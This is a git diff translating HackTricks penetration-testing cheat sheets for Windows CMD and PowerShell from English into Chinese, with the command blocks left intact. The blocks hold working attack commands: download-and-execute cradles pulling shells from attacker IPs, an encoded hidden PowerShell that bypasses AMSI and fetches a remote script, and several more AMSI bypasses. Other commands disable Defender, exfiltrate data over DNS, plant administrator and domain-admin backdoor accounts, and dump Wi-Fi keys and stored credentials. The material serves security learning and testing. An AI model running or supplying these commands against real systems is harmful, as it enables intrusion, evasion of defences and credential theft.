 - [http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html](http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html)
 - [http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/](http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/)
 
-### Using python for build injectors example:
+### 使用 Python 构建注入器示例：
 
 - [https://github.com/cocomelonc/peekaboo](https://github.com/cocomelonc/peekaboo)
 
-### Other tools
-
+### 其他工具
 ```bash
 # Veil Framework:
 https://github.com/Veil-Framework/Veil
@@ -566,16 +525,14 @@ https://github.com/TheWover/donut
 # Vulcan
 https://github.com/praetorian-code/vulcan
 ```
-
-### More
+### 更多
 
 - [https://github.com/persianhydra/Xeexe-TopAntivirusEvasion](https://github.com/persianhydra/Xeexe-TopAntivirusEvasion)
 
 <figure><img src="../images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
 
-If you are interested in **hacking career** and hack the unhackable - **we are hiring!** (_fluent polish written and spoken required_).
+如果你对**黑客职业**感兴趣并想要攻克不可攻克的目标 - **我们正在招聘！**（_需要流利的波兰语书写和口语能力_）。
 
 {% embed url="https://www.stmcyber.com/careers" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/basic-cmd-for-pentesters.md b/src/windows-hardening/basic-cmd-for-pentesters.md
index d47497701..d6eda6257 100644
--- a/src/windows-hardening/basic-cmd-for-pentesters.md
+++ b/src/windows-hardening/basic-cmd-for-pentesters.md
@@ -1,19 +1,18 @@
-# Basic Win CMD for Pentesters
+# 基本的 Win CMD 用于渗透测试人员
 
 {{#include ../banners/hacktricks-training.md}}
 
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度审视您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们 20 多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化漏洞利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
-## System info
-
-### Version and Patches info
+## 系统信息
 
+### 版本和补丁信息
 ```bash
 wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% #Get architecture
 systeminfo
@@ -27,46 +26,36 @@ hostname
 
 DRIVERQUERY #3rd party driver vulnerable?
 ```
-
-### Environment
-
+### 环境
 ```bash
 set #List all environment variables
 ```
+一些环境变量需要强调：
 
-Some env variables to highlight:
-
-- **COMPUTERNAME**: Name of the computer
-- **TEMP/TMP:** Temp folder
-- **USERNAME:** Your username
-- **HOMEPATH/USERPROFILE:** Home directory
+- **COMPUTERNAME**: 计算机名称
+- **TEMP/TMP:** 临时文件夹
+- **USERNAME:** 你的用户名
+- **HOMEPATH/USERPROFILE:** 主目录
 - **windir:** C:\Windows
-- **OS**:Windos OS
-- **LOGONSERVER**: Name of domain controller
-- **USERDNSDOMAIN**: Domain name to use with DNS
-- **USERDOMAIN**: Name of the domain
-
+- **OS**: Windows 操作系统
+- **LOGONSERVER**: 域控制器名称
+- **USERDNSDOMAIN**: 用于 DNS 的域名
+- **USERDOMAIN**: 域的名称
 ```bash
 nslookup %LOGONSERVER%.%USERDNSDOMAIN% #DNS request for DC
 ```
-
-### Mounted disks
-
+### 挂载的磁盘
 ```bash
 (wmic logicaldisk get caption 2>nul | more) || (fsutil fsinfo drives 2>nul)
 wmic logicaldisk get caption,description,providername
 ```
-
 ### [Defender](authentication-credentials-uac-and-efs/#defender)
 
-### Recycle Bin
-
+### 回收站
 ```bash
 dir C:\$Recycle.Bin /s /b
 ```
-
-### Processes, Services & Software
-
+### 进程、服务和软件
 ```bash
 schtasks /query /fo LIST /v #Verbose out of scheduled tasks
 schtasks /query /fo LIST 2>nul | findstr TaskName
@@ -80,9 +69,7 @@ dir /a "C:\Program Files" #Installed software
 dir /a "C:\Program Files (x86)" #Installed software
 reg query HKEY_LOCAL_MACHINE\SOFTWARE #Installed software
 ```
-
-## Domain info
-
+## 域信息
 ```bash
 # Generic AD info
 echo %USERDOMAIN% #Get domain name
@@ -127,18 +114,14 @@ nltest /domain_trusts #Mapping of the trust relationships
 # Get all objects inside an OU
 dsquery * "CN=Users,DC=INLANEFREIGHT,DC=LOCAL"
 ```
-
-### Logs & Events
-
+### 日志与事件
 ```bash
 #Make a security query using another credentials
 wevtutil qe security /rd:true /f:text /r:helpline /u:HELPLINE\zachary /p:0987654321
 ```
+## 用户与组
 
-## Users & Groups
-
-### Users
-
+### 用户
 ```bash
 #Me
 whoami /all #All info about me, take a look at the enabled tokens
@@ -162,9 +145,7 @@ runas /netonly /user<DOMAIN>\<NAME> "cmd.exe" ::The password will be prompted
 logonsessions.exe
 logonsessions64.exe
 ```
-
-### Groups
-
+### 组
 ```bash
 #Local
 net localgroup #All available groups
@@ -175,30 +156,22 @@ net localgroup administrators [username] /add #Add user to administrators
 net group /domain #Info about domain groups
 net group /domain <domain_group_name> #Users that belongs to the group
 ```
-
-### List sessions
-
+### 列出会话
 ```
 qwinsta
 klist sessions
 ```
-
-### Password Policy
-
+### 密码策略
 ```
 net accounts
 ```
-
-### Credentials
-
+### 凭据
 ```bash
 cmdkey /list #List credential
 vaultcmd /listcreds:"Windows Credentials" /all #List Windows vault
 rundll32 keymgr.dll, KRShowKeyMgr #You need graphical access
 ```
-
-### Persistence with users
-
+### 与用户的持久性
 ```bash
 # Add domain user and put them in Domain Admins group
 net user username password /ADD /DOMAIN
@@ -213,11 +186,9 @@ net localgroup "Remote Desktop Users" UserLoginName  /add
 net localgroup "Debugger users" UserLoginName /add
 net localgroup "Power users" UserLoginName /add
 ```
+## 网络
 
-## Network
-
-### Interfaces, Routes, Ports, Hosts and DNSCache
-
+### 接口、路由、端口、主机和DNS缓存
 ```bash
 ipconfig /all #Info about interfaces
 route print #Print available routes
@@ -226,9 +197,7 @@ netstat -ano #Opened ports?
 type C:\WINDOWS\System32\drivers\etc\hosts
 ipconfig /displaydns | findstr "Record" | findstr "Name Host"
 ```
-
-### Firewall
-
+### 防火墙
 ```bash
 netsh firewall show state # FW info, open ports
 netsh advfirewall firewall show rule name=all
@@ -267,9 +236,7 @@ net user hacker Hacker123! /add & net localgroup administrators hacker /add & ne
 xfreerdp /u:alice /d:WORKGROUP /pth:b74242f37e47371aff835a6ebcac4ffe /v:10.11.1.49
 xfreerdp /u:hacker /d:WORKGROUP /p:Hacker123! /v:10.11.1.49
 ```
-
-### Shares
-
+### 共享
 ```bash
 net view #Get a list of computers
 net view /all /domain [domainname] #Shares on the domains
@@ -277,56 +244,40 @@ net view \\computer /ALL #List shares of a computer
 net use x: \\computer\share #Mount the share locally
 net share #Check current shares
 ```
-
 ### Wifi
-
 ```bash
 netsh wlan show profile #AP SSID
 netsh wlan show profile <SSID> key=clear #Get Cleartext Pass
 ```
-
 ### SNMP
-
 ```
 reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
 ```
-
-### Network Interfaces
-
+### 网络接口
 ```bash
 ipconfig /all
 ```
-
-### ARP table
-
+### ARP 表
 ```bash
 arp -A
 ```
-
-## Download
+## 下载
 
 Bitsadmin.exe
-
 ```
 bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
 ```
-
 CertReq.exe
-
 ```
 CertReq -Post -config https://example.org/ c:\windows\win.ini output.txt
 ```
-
 Certutil.exe
-
 ```
 certutil.exe -urlcache -split -f "http://10.10.14.13:8000/shell.exe" s.exe
 ```
+**在** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/) **中搜索 `Download` 可以找到更多内容**
 
-**Find much more searching for `Download` in** [**https://lolbas-project.github.io**](https://lolbas-project.github.io/)
-
-## Misc
-
+## 杂项
 ```bash
 cd #Get current dir
 cd C:\path\to\dir #Change dir
@@ -363,18 +314,14 @@ powershell (Get-Content file.txt -Stream ads.txt)
 # Get error messages from code
 net helpmsg 32 #32 is the code in that case
 ```
-
-### Bypass Char Blacklisting
-
+### 绕过字符黑名单
 ```bash
 echo %HOMEPATH:~6,-11%   #\
 who^ami   #whoami
 ```
-
 ### DOSfuscation
 
-Generates an obfuscated CMD line
-
+生成一个模糊化的 CMD 行
 ```powershell
 git clone https://github.com/danielbohannon/Invoke-DOSfuscation.git
 cd Invoke-DOSfuscation
@@ -384,28 +331,22 @@ help
 SET COMMAND type C:\Users\Administrator\Desktop\flag.txt
 encoding
 ```
+### 监听地址 ACLs
 
-### Listen address ACLs
-
-You can listen on [http://+:80/Temporary_Listen_Addresses/](http://+/Temporary_Listen_Addresses/) without being administrator.
-
+您可以在 [http://+:80/Temporary_Listen_Addresses/](http://+/Temporary_Listen_Addresses/) 上监听，而无需成为管理员。
 ```bash
 netsh http show urlacl
 ```
+### 手动 DNS shell
 
-### Manual DNS shell
-
-**Attacker** (Kali) must use one of these 2 options:
-
+**攻击者** (Kali) 必须使用以下两个选项之一：
 ```bash
 sudo responder -I <iface> #Active
 sudo tcpdump -i <iface> -A proto udp and dst port 53 and dst ip <KALI_IP> #Passive
 ```
-
 #### Victim
 
-**`for /f tokens`** technique: This allows us to execute commands, get the first X words of each line and send it through DNS to our server
-
+**`for /f tokens`** 技术：这允许我们执行命令，获取每行的前 X 个单词，并通过 DNS 发送到我们的服务器
 ```bash
 for /f %a in ('whoami') do nslookup %a <IP_kali> #Get whoami
 for /f "tokens=2" %a in ('echo word1 word2') do nslookup %a <IP_kali> #Get word2
@@ -415,16 +356,12 @@ for /f "tokens=1,2,3" %a in ('dir /B "C:\Progra~2"') do nslookup %a.%b.%c <IP_ka
 #More complex commands
 for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('whoami /priv ^| findstr /i "enable"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali> #Same as last one
 ```
-
-You can also **redirect** the output, and then **read** it.
-
+您还可以**重定向**输出，然后**读取**它。
 ```
 whoami /priv | finstr "Enab" > C:\Users\Public\Documents\out.txt
 for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.txt"') do nslookup %a.%b.%c.%d.%e.%f.%g.%h.%i <IP_kali>
 ```
-
-## Calling CMD from C code
-
+## 从 C 代码调用 CMD
 ```c
 #include <stdlib.h>     /* system, NULL, EXIT_FAILURE */
 
@@ -433,17 +370,15 @@ for /f "tokens=1,2,3,4,5,6,7,8,9" %a in ('type "C:\Users\Public\Documents\out.tx
 // upx -9 addmin.exe
 
 int main (){
-    int i;
-    i=system("net users otherAcc 0TherAcc! /add");
-    i=system("net localgroup administrators otherAcc /add");
-    return 0;
+int i;
+i=system("net users otherAcc 0TherAcc! /add");
+i=system("net localgroup administrators otherAcc /add");
+return 0;
 }
 ```
+## 备用数据流备忘单 (ADS/备用数据流)
 
-## Alternate Data Streams CheatSheet (ADS/Alternate Data Stream)
-
-**Examples taken from** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**. There are a lot more in there!**
-
+**示例来自** [**https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f**](https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f)**. 里面还有很多更多的内容！**
 ```bash
 ## Selected Examples of ADS Operations ##
 
@@ -469,14 +404,12 @@ wmic process call create '"C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfil
 # Execute a script stored in an ADS using PowerShell
 powershell -ep bypass - < c:\temp:ttt
 ```
-
 <figure><img src="/images/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
 
-**Get a hacker's perspective on your web apps, network, and cloud**
+**从黑客的角度看待您的网络应用、网络和云**
 
-**Find and report critical, exploitable vulnerabilities with real business impact.** Use our 20+ custom tools to map the attack surface, find security issues that let you escalate privileges, and use automated exploits to collect essential evidence, turning your hard work into persuasive reports.
+**查找并报告具有实际业务影响的关键可利用漏洞。** 使用我们20多个自定义工具来映射攻击面，发现让您提升权限的安全问题，并使用自动化利用收集重要证据，将您的辛勤工作转化为有说服力的报告。
 
 {% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
 
 {{#include ../banners/hacktricks-training.md}}
-
diff --git a/src/windows-hardening/basic-powershell-for-pentesters/README.md b/src/windows-hardening/basic-powershell-for-pentesters/README.md
index e2ab70a69..6ebf73dd6 100644
--- a/src/windows-hardening/basic-powershell-for-pentesters/README.md
+++ b/src/windows-hardening/basic-powershell-for-pentesters/README.md
@@ -1,16 +1,13 @@
-# Basic PowerShell for Pentesters
+# 基本 PowerShell 用于渗透测试人员
 
 {{#include ../../banners/hacktricks-training.md}}
 
-## Default PowerShell locations
-
+## 默认 PowerShell 位置
 ```powershell
 C:\windows\syswow64\windowspowershell\v1.0\powershell
 C:\Windows\System32\WindowsPowerShell\v1.0\powershell
 ```
-
-## Basic PS commands to start
-
+## 基本 PS 命令入门
 ```powershell
 Get-Help * #List everything loaded
 Get-Help process #List everything containing "process"
@@ -19,9 +16,7 @@ Get-Help Get-Item -Examples #List examples
 Import-Module <modulepath>
 Get-Command -Module <modulename>
 ```
-
-## Download & Execute
-
+## 下载与执行
 ```powershell
 g
 echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.13:8000/PowerUp.ps1') | powershell -noprofile - #From cmd download and execute
@@ -35,64 +30,48 @@ $wr = [System.NET.WebRequest]::Create("http://10.10.14.9:8000/ipw.ps1") $r = $wr
 #host a text record with your payload at one of your (unburned) domains and do this:
 powershell . (nslookup -q=txt http://some.owned.domain.com)[-1]
 ```
-
-### Download & Execute in background with AMSI Bypass
-
+### 下载并在后台执行，带有 AMSI 绕过
 ```powershell
 Start-Process -NoNewWindow powershell "-nop -Windowstyle hidden -ep bypass -enc JABhACAAPQAgACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAJwA7ACQAYgAgAD0AIAAnAG0AcwAnADsAJAB1ACAAPQAgACcAVQB0AGkAbABzACcACgAkAGEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFIAZQBmAF0ALgBBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAKAAnAHsAMAB9AHsAMQB9AGkAewAyAH0AJwAgAC0AZgAgACQAYQAsACQAYgAsACQAdQApACkAOwAKACQAZgBpAGUAbABkACAAPQAgACQAYQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQARgBpAGUAbABkACgAKAAnAGEAewAwAH0AaQBJAG4AaQB0AEYAYQBpAGwAZQBkACcAIAAtAGYAIAAkAGIAKQAsACcATgBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkAOwAKACQAZgBpAGUAbABkAC4AUwBlAHQAVgBhAGwAdQBlACgAJABuAHUAbABsACwAJAB0AHIAdQBlACkAOwAKAEkARQBYACgATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAwAC4AMQAxAC8AaQBwAHMALgBwAHMAMQAnACkACgA="
 ```
-
-### Using b64 from linux
-
+### 从Linux使用b64
 ```powershell
 echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.31/shell.ps1')" | iconv -t UTF-16LE | base64 -w 0
 powershell -nop -enc <BASE64_ENCODED_PAYLOAD>
 ```
-
-## Download
+## 下载
 
 ### System.Net.WebClient
-
 ```powershell
 (New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
 ```
-
 ### Invoke-WebRequest
-
 ```powershell
 Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
 ```
-
 ### Wget
-
 ```powershell
 wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
 ```
-
 ### BitsTransfer
-
 ```powershell
 Import-Module BitsTransfer
 Start-BitsTransfer -Source $url -Destination $output
 # OR
 Start-BitsTransfer -Source $url -Destination $output -Asynchronous
 ```
-
 ## Base64 Kali & EncodedCommand
-
 ```powershell
 kali> echo -n "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.9:8000/9002.ps1')" | iconv --to-code UTF-16LE | base64 -w0
 PS> powershell -EncodedCommand <Base64>
 ```
+## [执行策略](../authentication-credentials-uac-and-efs/#ps-execution-policy)
 
-## [Execution Policy](../authentication-credentials-uac-and-efs/#ps-execution-policy)
+## [受限语言](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)
 
-## [Constrained language](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)
-
-## [AppLocker Policy](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)
-
-## Enable WinRM (Remote PS)
+## [AppLocker 策略](https://github.com/carlospolop/hacktricks/blob/master/windows-hardening/basic-powershell-for-pentesters/broken-reference/README.md)
 
+## 启用 WinRM (远程 PS)
 ```powershell
 enable-psremoting -force #This enables winrm
 
@@ -100,15 +79,13 @@ enable-psremoting -force #This enables winrm
 #Requires -RunasAdministrator
 
 Get-NetConnectionProfile |
-  Where{ $_.NetWorkCategory -ne 'Private'} |
-  ForEach {
-    $_
-    $_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
-  }
+Where{ $_.NetWorkCategory -ne 'Private'} |
+ForEach {
+$_
+$_|Set-NetConnectionProfile -NetWorkCategory Private -Confirm
+}
 ```
-
-## Disable Defender
-
+## 禁用 Defender
 ```powershell
 # Check status
 Get-MpComputerStatus
@@ -136,15 +113,13 @@ ValueType : REG_SZ
 ValueLength : 4
 ValueData : 0
 ```
+### AMSI 绕过
 
-### AMSI bypass
+**`amsi.dll`** 被 **加载** 到你的进程中，并具有任何应用程序交互所需的 **导出**。由于它被加载到你 **控制** 的进程的内存空间中，你可以通过 **覆盖内存中的指令** 来改变其行为。使其无法检测任何内容。
 
-**`amsi.dll`** is **loaded** into your process, and has the necessary **exports** for any application interact with. And because it's loaded into the memory space of a process you **control**, you can change its behaviour by **overwriting instructions in memory**. Making it not detect anything.
-
-Therefore, the goal of the AMSI bypasses you will are to **overwrite the instructions of that DLL in memory to make the detection useless**.
-
-**AMSI bypass generator** web page: [**https://amsi.fail/**](https://amsi.fail/)
+因此，AMSI 绕过的目标是 **在内存中覆盖该 DLL 的指令，使检测无效**。
 
+**AMSI 绕过生成器** 网页: [**https://amsi.fail/**](https://amsi.fail/)
 ```powershell
 # A Method
 [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true)
@@ -189,41 +164,37 @@ https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
 https://github.com/cobbr/PSAmsi/wiki/Conducting-AMSI-Scans
 https://slaeryan.github.io/posts/falcon-zero-alpha.html
 ```
+### AMSI Bypass 2 - 管理 API 调用钩子
 
-### AMSI Bypass 2 - Managed API Call Hooking
+查看 [**此帖子以获取详细信息和代码**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/)。介绍：
 
-Check [**this post for detailed info and the code**](https://practicalsecurityanalytics.com/new-amsi-bypass-using-clr-hooking/). Introduction:
+这种新技术依赖于 .NET 方法的 API 调用钩子。事实证明，.NET 方法需要编译为内存中的本机机器指令，这些指令最终看起来与本机方法非常相似。这些编译的方法可以被钩住，以改变程序的控制流。
 
-This new technique relies upon API call hooking of .NET methods. As it turns out, .NET Methods need to get compiled down to native machine instructions in memory which end up looking very similar to native methods. These compiled methods can hooked to change the control flow of a program.
+执行 .NET 方法的 API 调用钩子的步骤如下：
 
-The steps performing API cal hooking of .NET methods are:
+1. 确定要钩住的目标方法
+2. 定义一个与目标具有相同函数原型的方法
+3. 使用反射查找方法
+4. 确保每个方法都已编译
+5. 找到每个方法在内存中的位置
+6. 用指向我们恶意方法的指令覆盖目标方法
 
-1. Identify the target method to hook
-2. Define a method with the same function prototype as the target
-3. Use reflection to find the methods
-4. Ensure each method has been compiled
-5. Find the location of each method in memory
-6. Overwrite the target method with instructions pointing to our malicious method
+### AMSI Bypass 3 - SeDebug 特权
 
-### AMSI Bypass 3 - SeDebug Privilege
+[**按照此指南和代码**](https://github.com/MzHmO/DebugAmsi)，您可以看到如何通过足够的特权来调试进程，您可以生成一个 powershell.exe 进程，调试它，监视何时加载 `amsi.dll` 并禁用它。
 
-[**Following this guide & code**](https://github.com/MzHmO/DebugAmsi) you can see how with enough privileges to debug processes, you can spawn a powershell.exe process, debug it, monitor when it loads `amsi.dll` and disable it.
-
-### AMSI Bypass - More Resources
+### AMSI Bypass - 更多资源
 
 - [S3cur3Th1sSh1t/Amsi-Bypass-Powershell](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)
-- [Amsi Bypass on Windows 11 In 2023](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
+- [2023 年在 Windows 11 上的 Amsi Bypass](https://gustavshen.medium.com/bypass-amsi-on-windows-11-75d231b2cac6) [Github](https://github.com/senzee1984/Amsi_Bypass_In_2023)
 
 ## PS-History
-
 ```powershell
 Get-Content C:\Users\<USERNAME>\AppData\Roaming\Microsoft\Windows\Powershell\PSReadline\ConsoleHost_history.txt
 ```
+## 查找较新的文件
 
-## Find a newer files
-
-Options : `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc`
-
+选项 : `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUtc`, `LastWriteTime`, `LastWriteTimeUtc`
 ```powershell
 # LastAccessTime:
 (gci C:\ -r | sort -Descending LastAccessTime | select -first 100) | Select-Object -Property LastAccessTime,FullName
@@ -231,59 +202,43 @@ Options : `CreationTime`, `CreationTimeUtc`, `LastAccessTime`, `LastAccessTimeUt
 # LastWriteTime:
 (gci C:\ -r | sort -Descending LastWriteTime | select -first 100) | Select-Object -Property LastWriteTime,FullName
 ```
-
-## Get permissions
-
+## 获取权限
 ```powershell
 Get-Acl -Path "C:\Program Files\Vuln Services" | fl
 ```
-
-## OS version and HotFixes
-
+## 操作系统版本和补丁
 ```powershell
 [System.Environment]::OSVersion.Version #Current OS version
 Get-WmiObject -query 'select * from win32_quickfixengineering' | foreach {$_.hotfixid} #List all patches
 Get-Hotfix -description "Security update" #List only "Security Update" patches
 ```
-
-## Environment
-
+## 环境
 ```powershell
 Get-ChildItem Env: | ft Key,Value -AutoSize #get all values
 $env:UserName @Get UserName value
 ```
-
-## Other connected drives
-
+## 其他连接的驱动器
 ```powershell
 Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
 ```
-
-### Recycle Bin
-
+### 回收站
 ```powershell
 $shell = New-Object -com shell.application
 $rb = $shell.Namespace(10)
 $rb.Items()
 ```
-
-[https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/](https://jdhitsolutions.com/blog/powershell/7024/managing-the-recycle-bin-with-powershell/)
-
-## Domain Recon
+## 域侦查
 
 {{#ref}}
 powerview.md
 {{#endref}}
 
-## Users
-
+## 用户
 ```powershell
 Get-LocalUser | ft Name,Enabled,Description,LastLogon
 Get-ChildItem C:\Users -Force | select Name
 ```
-
-## Secure String to Plaintext
-
+## 安全字符串到明文
 ```powershell
 $pass = "01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692" | convertto-securestring
 $user = "HTB\Tom"
@@ -295,9 +250,7 @@ Password       : 1ts-mag1c!!!
 SecurePassword : System.Security.SecureString
 Domain         : HTB
 ```
-
-Or directly parsing form XML:
-
+或直接解析 XML：
 ```powershell
 $cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *
 
@@ -306,9 +259,7 @@ Password       : 1ts-mag1c!!!
 SecurePassword : System.Security.SecureString
 Domain         : HTB
 ```
-
 ## SUDO
-
 ```powershell
 #CREATE A CREDENTIAL OBJECT
 $pass = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
@@ -330,50 +281,36 @@ $secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
 $mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
 $computer = "<hostname>"
 ```
-
-## Groups
-
+## 组
 ```powershell
 Get-LocalGroup | ft Name #All groups
 Get-LocalGroupMember Administrators | ft Name, PrincipalSource #Members of Administrators
 ```
-
-## Clipboard
-
+## 剪贴板
 ```powershell
 Get-Clipboard
 ```
-
-## Processes
-
+## 进程
 ```powershell
 Get-Process | where {$_.ProcessName -notlike "svchost*"} | ft ProcessName, Id
 ```
-
-## Services
-
+## 服务
 ```
 Get-Service
 ```
-
-## Password from secure string
-
+## 从安全字符串获取密码
 ```powershell
 $pw=gc admin-pass.xml | convertto-securestring #Get the securestring from the file
 $cred=new-object system.management.automation.pscredential("administrator", $pw)
 $cred.getnetworkcredential() | fl * #Get plaintext password
 ```
-
-## Scheduled Tasks
-
+## 计划任务
 ```powershell
 Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 ```
+## 网络
 
-## Network
-
-### Port Scan
-
+### 端口扫描
 ```powershell
 # Check Port or Single IP
 Test-NetConnection -Port 80 10.10.10.10
@@ -388,16 +325,12 @@ Test-NetConnection -Port 80 10.10.10.10
 "10.10.10.10","10.10.10.11" | % { $a = $_; write-host "[INFO] Testing $_ ..."; 80,443,445,8080 | % {echo ((new-object Net.Sockets.TcpClient).Connect("$a",$_)) "$a : $_ is open!"} 2>$null}
 
 ```
-
-### Interfaces
-
+### 接口
 ```powershell
 Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
 Get-DnsClientServerAddress -AddressFamily IPv4 | ft
 ```
-
-### Firewall
-
+### 防火墙
 ```powershell
 Get-NetFirewallRule -Enabled True
 
@@ -413,56 +346,42 @@ New-NetFirewallRule -DisplayName 'SSH (Port 22)' -Direction Inbound -LocalPort 2
 ## You can user the following line changing the initial filters to indicat a difefrent direction or action
 Get-NetFirewallRule -Direction Outbound -Enabled True -Action Block | Format-Table -Property  DisplayName, @{Name='Protocol';Expression={($PSItem | Get-NetFirewallPortFilter).Protocol}},@{Name='LocalPort';Expression={($PSItem | Get-NetFirewallPortFilter).LocalPort}}, @{Name='RemotePort';Expression={($PSItem | Get-NetFirewallPortFilter).RemotePort}},@{Name='RemoteAddress';Expression={($PSItem | Get-NetFirewallAddressFilter).RemoteAddress}},Profile,Direction,Action
 ```
-
-### Route
-
+### 路由
 ```powershell
 route print
 ```
-
 ### ARP
-
 ```powershell
 Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
 ```
-
-### Hosts
-
+### 主机
 ```powershell
 Get-Content C:\WINDOWS\System32\drivers\etc\hosts
 ```
-
 ### Ping
-
 ```powershell
 $ping = New-Object System.Net.Networkinformation.Ping
 1..254 | % { $ping.send("10.9.15.$_") | select address, status }
 ```
-
 ### SNMP
-
 ```powershell
 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 ```
-
-## **Converting the SDDL String into a Readable Format**
-
+## **将SDDL字符串转换为可读格式**
 ```powershell
 PS C:\> ConvertFrom-SddlString "O:BAG:BAD:AI(D;;DC;;;WD)(OA;CI;CR;ab721a53-1e2f-11d0-9819-00aa0040529b;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CR;00299570-246d-11d0-a768-00aa006e0529;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CIIO;CCDCLC;c975c901-6cea-4b6f-8319-d67f45449506;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-3842939050-3880317879-2865463114-522)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-498)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD